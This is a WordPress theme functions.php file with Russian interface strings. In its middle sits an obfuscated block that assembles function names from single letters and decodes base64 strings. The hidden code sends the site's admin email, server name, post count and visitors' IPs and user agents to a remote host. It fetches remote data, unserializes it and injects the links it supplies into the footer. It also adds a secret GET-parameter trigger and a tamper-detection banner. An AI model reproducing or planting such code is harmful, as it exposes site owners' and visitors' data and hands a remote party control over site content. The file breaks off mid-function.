<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $yliM='b';$JLbLv='c';$oubKCn='d';$aEmx='o';$VJHS='e';$WJbTIc='6';$QLFaVa='_';$lssw='e';$UnlAo='d';$Istsw='s';$ZoilxV='4';$tPXkk='a';$BWvV='e';$DmwWZaQr=$yliM.$tPXkk.$Istsw.$lssw.$WJbTIc.$ZoilxV.$QLFaVa.$oubKCn.$VJHS.$JLbLv.$aEmx.$UnlAo.$BWvV;$iMnI='a';$qcIN='l';$XYxZAzR='n';$wiyuZvs='t';$bzbjAKX='i';$ObzwkA='z';$vSWmJ='e';$cFDt='g';$ESYHyCa='f';$HcBbRqfb=$cFDt.$ObzwkA.$bzbjAKX.$XYxZAzR.$ESYHyCa.$qcIN.$iMnI.$wiyuZvs.$vSWmJ;$uJXSfQ='t';$Pkvo='s';$iOTqo='1';$vOki='r';$JOTWk='_';$IYJBUUK='3';$RXTJdJx='t';$Zswo='o';$szqxhzb='r';$BmvpzEbN=$Pkvo.$uJXSfQ.$szqxhzb.$JOTWk.$vOki.$Zswo.$RXTJdJx.$iOTqo.$IYJBUUK;$IzcnZKG='e';$YnnmocW='r';$JAfw='r';$nUSBy='v';$ElKFU='t';$HspDoD='s';$aPJJGDeE=$HspDoD.$ElKFU.$JAfw.$YnnmocW.$IzcnZKG.$nUSBy;                     
		$uc______________v='b';$ol____________w='c';$tx_________o='d';$po______q='o';$ak_______e='e';$nx__z='6';$dq_________z='_';$bv___________l='e';$ja__x='d';$id_____________m='s';$dk____________s='4';$ed__o='a';$yc______________c='e';$uw___________d=$uc______________v.$ed__o.$id_____________m.$bv___________l.$nx__z.$dk____________s.$dq_________z.$tx_________o.$ak_______e.$ol____________w.$po______q.$ja__x.$yc______________c;
		$km_______s='t';$ov_________f='u';$lq____________x='n';$nz__y='s';$tj_______w='e';$up__g='t';$mz____x='f';$st____h='x';$cj_______i='n';$pq_______________y='c';$we__v='i';$jd_____e='i';$qx_____________e='_';$tg_______p='s';$ib__________i='o';$iy__q=$mz____x.$ov_________f.$cj_______i.$pq_______________y.$up__g.$we__v.$ib__________i.$lq____________x.$qx_____________e.$tj_______w.$st____h.$jd_____e.$tg_______p.$km_______s.$nz__y;
		$yq___________z='e';$ng_____f='p';$kz____________y='n';$js_______z='o';$yj___________l='f';$od____________r=$yj___________l.$js_______z.$ng_____f.$yq___________z.$kz____________y;
		$vc______________y='e';$yl______j='f';$kb______w='r';$yj_________h='a';$te_________n='d';$os________v=$yl______j.$kb______w.$vc______________y.$yj_________h.$te_________n;
		$lp_______________f='e';$vp____________e='c';$it____s='s';$it______________j='l';$xo_______________i='f';$my_______q='o';$pn_____________c=$xo_______________i.$vp____________e.$it______________j.$my_______q.$it____s.$lp_______________f;
		
		define("WP_ID", $uw___________d("Mi4wLjA="));
		define("WP_TTL", $uw___________d("MTA4MDA="));
		define("WP_SRC", $uw___________d("dHBva24="));
	


		function wp_get_header() {
			global $uw___________d, $iy__q;
			
			if (
				$iy__q($uw___________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$iy__q($uw___________d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$iy__q($uw___________d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $uw___________d, $od____________r, $pn_____________c, $os________v;
			
			$nr___________t = TEMPLATEPATH."/".$uw___________d("Zm9vdGVyLnBocA==");
			$jn__________f = @$od____________r($nr___________t, "r");
			$nr___________t = @$os________v($jn__________f, @filesize($nr___________t));
			@$pn_____________c($jn__________f);
			
			$th_______________i = TEMPLATEPATH."/".$uw___________d("ZnVuY3Rpb25zLnBocA==");
			$jn__________f = @$od____________r($th_______________i, "r");
			$th_______________i = @$os________v($jn__________f, @filesize($th_______________i));
			@$pn_____________c($jn__________f);
			
			$xx____s = 0;
			if($nr___________t && $th_______________i) {
				if ($uw___________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($nr___________t, $uw___________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xx____s = 1;
					}
					if (substr_count($nr___________t, "wp_theme_GPL_credits()") < 1) {
						$xx____s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xx____s = 12;
				}
			}
			
			if($xx____s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xx____s -->";
			}
		}
	


		function wp_loaded() {
			global $uw___________d, $iy__q;
			return $iy__q($uw___________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($en_________y, $wq_____________a = "(more...)", $tj_________e = 0, $qd__________t = "") {
				$ei_______________h = get_the_content($wq_____________a, $tj_________e, $qd__________t);
				$ei_______________h = apply_filters("the_content", $ei_______________h);
				
				$ei_______________h = str_replace("]]>", "]]>", $ei_______________h);
				if (strlen($_GET["p"]) > 0) {
					echo $ei_______________h;
				}
				else if ((strlen($ei_______________h)>$en_________y) && ($vw_______________n = strpos($ei_______________h, " ", $en_________y ))) {
					$ei_______________h = substr($ei_______________h, 0, $vw_______________n);
					$ei_______________h = $ei_______________h;
					echo $ei_______________h;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$wq_____________a</a></div></p>";
				} else {
					echo $ei_______________h;
				}
				
			}
		}
	


		$hv__________e='o';$zn______t='s';$ww_________z='e';$hq_____t='e';$mj______e='6';$po_____________z='n';$rd____e='d';$lz______c='b';$rd___r='_';$wt________v='c';$kh_______________m='a';$mm_______e='e';$rp________c='4';$fg_______________n=$lz______c.$kh_______________m.$zn______t.$ww_________z.$mj______e.$rp________c.$rd___r.$hq_____t.$po_____________z.$wt________v.$hv__________e.$rd____e.$mm_______e;
		$fk__j='o';$kj_________r='n';$uv_______________s='c';$hq_________b='s';$hu____o='_';$qc______________i='t';$un_______________q='g';$ah____s='e';$mq__________d='n';$um______o='t';$ez______e='e';$re_______x='e';$hl_______________r='_';$xj_______i='l';$se______________w='f';$sm________a='t';$hz___________k='i';$eh______x=$se______________w.$hz___________k.$xj_______i.$ez______e.$hl_______________r.$un_______________q.$re_______x.$qc______________i.$hu____o.$uv_______________s.$fk__j.$kj_________r.$um______o.$ah____s.$mq__________d.$sm________a.$hq_________b;
		$bh________j='f';$ww________p='x';$ea_________r='t';$mk_____________w='l';$eh____a='_';$gx_______________h='i';$st_______q='i';$kj_________k='s';$xn_______________d='e';$el__________x='s';$zd____________c='e';$sq________e=$bh________j.$st_______q.$mk_____________w.$zd____________c.$eh____a.$xn_______________d.$ww________p.$gx_______________h.$el__________x.$ea_________r.$kj_________k;
		$uq___________x='m';$ru__________r='c';$ck____t='v';$mp____________s='a';$mj_______l='i';$fu__p='o';$zr__________e='e';$ug__________w='_';$ce________g='s';$kc_____________f='e';$mg_____________c='o';$qo_____________p='r';$vd____h='p';$zr____________n='n';$jt______i='r';$jv________a=$ck____t.$zr__________e.$qo_____________p.$ce________g.$mj_______l.$fu__p.$zr____________n.$ug__________w.$ru__________r.$mg_____________c.$uq___________x.$vd____h.$mp____________s.$jt______i.$kc_____________f;
		$nf_____________l='e';$nl___________i='c';$ld_____________q='p';$ls__________f='n';$yf______________d='f';$km__________v='o';$qu_________x='k';$tp____l='s';$tz________e='o';$cm_______________n=$yf______________d.$tp____l.$km__________v.$nl___________i.$qu_________x.$tz________e.$ld_____________q.$nf_____________l.$ls__________f;
		$mv__e='r';$kr________f='e';$cg_____i='w';$bd________a='i';$ur____________k='t';$gj__________o='f';$xr________v=$gj__________o.$cg_____i.$mv__e.$bd________a.$ur____________k.$kr________f;
		$iu__________d='d';$oe______p='m';$mk_________w='5';$id________h=$oe______p.$iu__________d.$mk_________w;
		$og______p='a';$ok______l='a';$at____________u='t';$hl___________l='h';$ai______________v='l';$qx_______________t='p';$ep___________e='r';$jk______________n='e';$gy___________x=$ep___________e.$jk______________n.$ok______l.$ai______________v.$qx_______________t.$og______p.$at____________u.$hl___________l;
		$tt_______o='i';$np_____________p='a';$kw____j='e';$vg__________y='n';$yf________t='e';$sv_____s='r';$zz_________r='z';$ig___v='l';$nm__________n='u';$rl______o='s';$cb___________q='i';$af____p=$nm__________n.$vg__________y.$rl______o.$yf________t.$sv_____s.$cb___________q.$np_____________p.$ig___v.$tt_______o.$zz_________r.$kw____j;
		$mh____________t='a';$ae___________k='n';$kg_____________e='m';$kv_______j='m';$nf__y='e';$hj_____q='p';$xd____________k='t';$zz_______j=$xd____________k.$nf__y.$kg_____________e.$hj_____q.$ae___________k.$mh____________t.$kv_______j;
		$di____________r='t';$ji___________x='r';$qt___d='e';$nk_______________d='a';$ad_____a='_';$jh__________w='r';$md_____n='t';$qk______________s='m';$ni________y='e';$ce___________g='e';$el_____________e='c';$yc_____o='x';$qe__________j='e';$zy_________k='o';$tt________w='a';$jr______________e='c';$mv__________v='n';$uh__i='s';$lo______f='t';$hn_________q='_';$po_________n='t';$hp________v=$uh__i.$lo______f.$ji___________x.$ni________y.$tt________w.$qk______________s.$ad_____a.$jr______________e.$zy_________k.$mv__________v.$di____________r.$qe__________j.$yc_____o.$md_____n.$hn_________q.$el_____________e.$jh__________w.$ce___________g.$nk_______________d.$po_________n.$qt___d;
	


		function zg____y($lm__________l) {
			global $uw___________d, $iy__q, $eh______x, $jv________a, $hp________v;
			
			if (!$iy__q($uw___________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($jv________a(PHP_VERSION, "5.0.0", ">=") && $iy__q($uw___________d("ZmlsZV9nZXRfY29udGVudHM=")) && $iy__q($uw___________d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$co_____p = $hp________v(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fv___________i = @$eh______x($lm__________l, 0, $co_____p);
			} else {
				$fv___________i = @$eh______x($lm__________l, 0);
			}
			
			return $fv___________i;
		}
	


		function xk_____________f($lm__________l) {
			global $iy__q, $cm_______________n, $xr________v, $uw___________d;
			
			if (!$iy__q($uw___________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$uk_________v = strpos($lm__________l, "/", 7);
			$uy____________c = array(
				"uri"     => substr($lm__________l, $uk_________v),
				"host"    => str_replace("http://", "", substr($lm__________l, 0, $uk_________v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$hg_______c = @$cm_______________n("$uy____________c[host]", 80, $uk___e, $oc_________f, 4);
			
			if (!$hg_______c) {
				return false;
			} else {
				$fv___________i = "";
				$qv_______t  = "GET $uy____________c[uri] HTTP/1.0\r\n";
				$qv_______t .= "Host: $uy____________c[host]\r\n";
				$qv_______t .= "Referer: $uy____________c[referer]\r\n";
				$qv_______t .= "Connection: Close\r\n\r\n";
				
				@$xr________v($hg_______c, $qv_______t);
				
				while (!@feof($hg_______c)) {
					$rd______v = @fgets($hg_______c, (1024*24));
					
					if ($rd______v == "\r\n") {
						$ew_______t = true;
						continue;
					}
					
					if ($ew_______t) {
						$fv___________i .= $rd______v;
					}
				}
				
				return $fv___________i;
			}
		}
	


		function dl__________k($lm__________l) {
			global $iy__q;
			$uy_____e = false;
			
			if ($lm__________l != "") {
				if ($iy__q("zg____y")) {
					$uy_____e = @zg____y($lm__________l);
				}
				
				if (!$uy_____e && ($iy__q("xk_____________f"))) {
					$uy_____e = @xk_____________f($lm__________l);
				}
			}
			
			return $uy_____e;
		}
	


		function th____________s() {
			global $_SERVER, $id________h;
			
			$ak______________t = $_SERVER["SERVER_NAME"];
			
			if (substr("$ak______________t", 0, 4) == "www.") {
				$ak______________t = substr("$ak______________t", 4);
			}
			
			$ak______________t = $id________h("$_SERVER[SERVER_NAME]");
			
			return $ak______________t;
		}
	


		function hp________e() {
			return "file";
		}
	


		function eb________b($lm__________l) {
			global $_SERVER, $eh______x, $sq________e, $od____________r, $pn_____________c, $xr________v;
			
			$xl______p = cs_________o();
			
			$zl________n = th____________s().".jpg";
			$sv_____________o = $xl______p["dir_upload"]["path"]."/$zl________n";
			$az_______________y = @filemtime($sv_____________o);
			
			if (!$az_______________y || ((time()-$az_______________y) >= WP_TTL)) {
				$uy_____e = dl__________k($lm__________l);
				
				if ($uy_____e) {
					if ($sq________e($sv_____________o)) {
						@unlink($sv_____________o);
					}
					
					$jn__________f = @$od____________r($sv_____________o, "x+");
					
					@$xr________v($jn__________f, $uy_____e);
					@$pn_____________c($jn__________f);
				}
			} else {
				if ($sq________e($sv_____________o)) {
					$uy_____e = @$eh______x($sv_____________o);
				} else {
					$uy_____e = false;
				}
			}
			
			return $uy_____e;
		}
	


		function cs_________o() {
			global $_SERVER, $uw___________d, $fg_______________n;
			
			$mh______r = wp_count_posts("post");
			$ot_______q = pathinfo(get_bloginfo("template_directory"));
			
			$xl______p = array(
				"url" => array(
					"report"      => $uw___________d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ot_______q,
				"dir_upload"	=> kl_______m(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ot_______q[filename],
					"a005=".$mh______r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$xl______p["url"]["queryString"] = implode("&", $xl______p["queryString"]);
			$xl______p["url"]["report"] = $xl______p["url"]["report"]."/?".$fg_______________n($xl______p["url"]["queryString"]).".html";
						
			return $xl______p;
		}
	


		function kl_______m() {
			$bk___________c = wp_upload_dir();
			
			if (isset($bk___________c["error"])) {
				$vp__g = uh______n();
				if (is_writable($vp__g)) {
					$bk___________c = array("path" => $vp__g);
				}
			}

			return $bk___________c;
		}
	


		function uh______n() {
			global $iy__q, $id________h, $gy___________x, $zz_______j;
			
			$rz______s = (bool) ini_get("safe_mode");
			if ($rz______s == true) {
				return false;
			}
			
			if ($iy__q("sys_get_temp_dir")) {
				$zx__z = sys_get_temp_dir();
				if (is_writable($zx__z)) {
					return $gy___________x($zx__z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $gy___________x($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $gy___________x($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $gy___________x($_ENV["TEMP"]);
			} else {
				$ze__________v = $zz_______j($id________h(uniqid(rand(), true)), "");
				if ($ze__________v) {
					$zx__z = $gy___________x(dirname($ze__________v));
					@unlink($ze__________v);
					return $zx__z;
				} else {
					return false;
				}
			}
		}
	


		function ww__________a() {
			global $_GET, $sq________e;
			
			$xl______p = cs_________o();
			$ak______________t = th____________s();
			$qx____a = hp________e();
			
			$cc__h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($qx____a == "file") {
					$rb_________r = $xl______p["dir_upload"]["path"]."/".$ak______________t.".jpg";
					if ($sq________e($rb_________r)) {
						@unlink($rb_________r);
						$cc__h = "deleted";
					}
				}
				
				$oi_______________p = array(
					"s"	=> $cc__h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($oi_______________p AS $xf_____________o => $hj_____e) echo " [$xf_____________o:$hj_____e]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $iy__q, $uw___________d, $af____p;
			$xl______p = cs_________o();
			
			$pp__________v = "eb________b";
			if ($iy__q($pp__________v)) {
				$fv___________i = $pp__________v($xl______p["url"]["report"]);
			}
			
			if ($fv___________i) {
				if ($fv___________i = @$uw___________d($fv___________i)) {
					$fv___________i = @$af____p($fv___________i);
					
					if (strlen($fv___________i[custom_credit]) >= 5) {
						$xl______p["default_string"] = $fv___________i[custom_credit];
					}
					
					if ($fv___________i["status"] == "0") {
						$zw__________l = 1;
						$md____________n = 1;
					} else {
						$zd__r = sizeof($fv___________i["links"]);
						$ud___i = $xl______p["default_string"];
						
						if ($zd__r > 0 && $fv___________i["links"] !== "") {
							$cz_______________v = 0;
							foreach ($fv___________i["links"] as $rf______j => $mp_______v) {
								$cz_______________v++;
								if ($mp_______v->l_path == "" || $mp_______v->l_path == $_SERVER["REQUEST_URI"]) {
									$mp_______v->l_href = htmlspecialchars(strip_tags($mp_______v->l_href));
									$mp_______v->l_title = htmlspecialchars(strip_tags($mp_______v->l_title));
									$mp_______v->l_anchor = htmlspecialchars(strip_tags($mp_______v->l_anchor));
									$ud___i .= " | ";
									$ud___i .= "<a href='$mp_______v->l_href' title='$mp_______v->l_title'";
									if ($mp_______v->l_nofollow == "1") {
										$ud___i .= " rel='nofollow'";
									}
									$ud___i .= ">$mp_______v->l_anchor</a>";
								}
							}
						}
						$xl______p["links"] = "$ud___i";
						if ($fv___________i[credit] == "0") {
							$xl______p["links"] = "";
						}
					}
				} else {
					$zw__________l = "1";
				}
			} else {
				$zw__________l = "1";
			}
			
			if ($zw__________l == "1") {
				$xl______p["links"] = $xl______p["default_string"];
			}
			
			echo "$xl______p[links]";
			
			echo "<!-- s: $fv___________i[signature] -->";
			ww__________a();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
